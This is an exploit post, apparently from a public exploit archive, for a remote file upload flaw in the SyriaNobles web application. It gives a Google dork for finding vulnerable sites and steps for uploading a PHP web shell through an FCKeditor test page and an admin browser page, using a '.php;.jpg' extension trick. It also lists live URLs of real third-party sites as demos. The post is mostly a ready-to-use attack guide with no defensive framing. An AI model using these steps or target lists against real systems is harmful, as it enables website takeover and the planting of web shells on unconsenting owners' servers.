facebook facebook twitter rss

SyriaNobles Remote File Upload Vulnerability

Author: Dr-AnGeL , Published: 22-05-2012
# Exploit Title: SyriaNobles Remote File Upload Vulnerability
# Date: 23/05/2012
# Author: Dr-AnGeL
# Home Page: Sec-1337.com So0N | Sec4ever.com | V4-Team.com | Exploi4arab.com
# Email: FQ9@HotmaiL.fr
# Category: webapps
# Security Risk: High
# Google dork: intext:"Powered by SyriaNobles.com, Internet Information Network"
# Tested on: Linux , Win 7 , win Xp
# Special Greet'z 2 XroGuE <3 | EvIL SheLL [R.I.P] | 4cHrf | xMjahd | Federal | X-Shadow | TheMMA | TurkisH-RuleZ | Dr.Kro0oz | Dr.5rab | Hmei7 | Web-Sniper | The Rock

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit :

[+] 1-Arbitary File Upload Vulnerability:

p0c: Site/admin/FCKeditor/editor/filemanager/upload/test.html


Rename Your Shell 0x0.php;.jpg And up It :)

You Wil Find It Into : Site/UserFiles/

[+] 2-Remote File Upload Into Live Browser :


p0c : Go The Admin Area

Like : Site/admin/index.php

Change index.php to browser.php

Upload your Shell .php Or .php;.jpg

You Will Find It In This Directory : Site/userdir/


Live Demo :

http://istanbolico.com/Site/admin/FCKeditor/editor/filemanager/upload/test.html

http://istanbolico.com/Site/admin/browser.php

http://www.alrahwanji.com/admin/FCKeditor/editor/filemanager/upload/test.html

http://www.alrahwanji.com/admin/browser.php
==========================================================================



The End .

Like us on Facebook :